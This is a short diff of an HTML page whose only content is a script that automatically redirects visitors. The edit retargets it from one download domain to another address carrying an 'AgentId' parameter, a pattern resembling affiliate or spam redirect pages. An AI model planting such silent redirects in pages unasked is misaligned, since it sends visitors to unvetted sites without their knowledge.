--- a/917355.html
+++ b/917355.html
@@ -1,3 +1,3 @@
 <script>
-  window.location.href="https://dl.hawcyy.com/?parent=917355&t=1592646123"
+  window.location.href="https://main.RY872.com/?AgentId=202048"
 </script>
